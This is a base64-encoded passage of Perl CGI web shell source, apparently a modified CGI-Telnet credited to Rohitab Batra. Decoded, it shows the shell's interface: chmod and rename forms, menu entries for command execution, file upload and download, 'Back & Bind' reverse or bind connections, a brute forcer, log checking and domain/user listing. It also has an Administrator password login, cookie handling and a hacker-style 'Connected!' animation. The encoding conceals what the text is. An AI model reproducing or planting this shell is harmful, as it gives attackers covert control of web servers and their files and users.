JPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCB